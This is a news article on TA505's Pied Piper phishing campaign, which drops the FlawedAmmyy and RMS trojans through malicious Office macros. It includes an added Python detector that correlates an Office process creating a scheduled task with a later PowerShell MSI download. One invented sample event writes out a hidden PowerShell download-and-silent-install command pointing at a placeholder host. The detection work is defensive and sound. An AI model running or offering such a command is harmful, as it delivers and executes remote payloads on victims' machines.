The hacker group known as TA505 is behind the ongoing phishing campaign that uses the FlawedAmmyy and Remote Manipulator (RMS) remote access Trojans to infect victims.
The campaign, named Pied Piper, is targeting a supplier of several well-known food chains, including Godiva Chocolates, Yogurtland, and Pinkberry.
The TA505 group is well known for developing and using banking malware and ransomware, but recently it has shown a growing interest in RAT malware, developing a newly discovered remote access trojan named tRAT.
TA505's tRAT campaign is not the only one in circulation; specialists say that many other phishing campaigns are also leveraging the Ammyy Admin RAT.
Remember that everything can be hacked. To stay away from threats in the cyber world, we recommend installing an antivirus for Windows or an antivirus for Mac on every device you own, depending on which OS it runs. If you are a company, we also recommend hiring a specialized cybersecurity company every year to run annual tests on your company's network; these tests include penetration testing and ethical hacking.
The Pied Piper phishing scheme relies on distributing Microsoft Office documents as attachments that trick victims into enabling malicious macros, which execute the infection chain.
Once a macro is enabled, it installs a scheduled task that executes the next step: a PowerShell command that downloads an MSI installer containing an executable downloader named MYEXE. This downloader searches the infected machine for AV solutions and then downloads the main payload as a temp file.
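Detection logic for the chain just described, as an added example that is not from the original article or from the researchers' report: it correlates an Office process creating a scheduled task with a later PowerShell MSI download on the same host. The Sysmon-style field names and the sample events are assumptions constructed for this example.

```python
"""Detect the Pied Piper chain described above in constructed process-creation
events. Field names imitate Sysmon Event ID 1 (assumption); the events are made up."""
from datetime import datetime, timedelta

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Constructed sample events, oldest first: ws01 shows the full chain, ws02 is benign.
EVENTS = [
    {"time": "2018-11-20T09:00:01", "host": "ws01", "image": "winword.exe",
     "parent": "explorer.exe", "cmdline": "winword.exe invoice.doc"},
    {"time": "2018-11-20T09:00:04", "host": "ws01", "image": "schtasks.exe",
     "parent": "winword.exe",
     "cmdline": "schtasks.exe /create /sc once /tn Update /tr powershell.exe ..."},
    {"time": "2018-11-20T09:01:10", "host": "ws01", "image": "powershell.exe",
     "parent": "svchost.exe",  # the Task Scheduler service runs the task
     "cmdline": "powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile("
                "'http://example.invalid/a.msi','C:\\Users\\Public\\a.msi'); "
                "msiexec /i C:\\Users\\Public\\a.msi /q"},
    {"time": "2018-11-20T09:30:00", "host": "ws02", "image": "powershell.exe",
     "parent": "explorer.exe", "cmdline": "powershell.exe Get-Process"},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")

def office_spawned_task(ev):
    """Stage 1: an Office process creating a scheduled task (the macro's persistence)."""
    return (ev["image"].lower() == "schtasks.exe"
            and ev["parent"].lower() in OFFICE_APPS
            and "/create" in ev["cmdline"].lower())

def powershell_fetches_msi(ev):
    """Stage 2: PowerShell downloading an MSI and/or handing it to msiexec."""
    c = ev["cmdline"].lower()
    return (ev["image"].lower() == "powershell.exe" and "downloadfile" in c
            and (".msi" in c or "msiexec" in c))

def find_chain(events, window_minutes=30):
    """Correlate both stages per host. Returns (host, stage1_time, stage2_time) for each
    Office->schtasks hit; stage2_time is None when no PowerShell MSI download followed
    within the window, because stage 1 alone still deserves triage."""
    hits = []
    for s1 in (e for e in events if office_spawned_task(e)):
        t1 = _ts(s1["time"])
        later = [e["time"] for e in events
                 if e["host"] == s1["host"] and powershell_fetches_msi(e)
                 and t1 <= _ts(e["time"]) <= t1 + timedelta(minutes=window_minutes)]
        hits.append((s1["host"], s1["time"], min(later) if later else None))
    return hits
```

Run against real telemetry, the window and the benign-parent list would need tuning, since Office processes legitimately spawn schtasks.exe in some managed environments.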
After analyzing the malware, researchers reported that FlawedAmmyy gives attackers full access to the victim's PC, allowing them to steal files and credentials, collect screengrabs, and access the camera and microphone. Attackers can also move laterally through the network, and an infected supplier can serve as a potential entry point for a major supply chain attack.
Keep in mind that our modern society depends on computers, mobile devices, and the internet; always stay safe and secure.
We will continue to monitor the cybersecurity world. Meanwhile, users should keep a keen eye out for cyber attacks. Remember to use an antivirus for Windows or an antivirus for Mac on every device you own, depending on which OS your machine runs. If you are a company, we recommend hiring a specialized cybersecurity company every year to run annual tests on your company's network, including penetration testing and ethical hacking.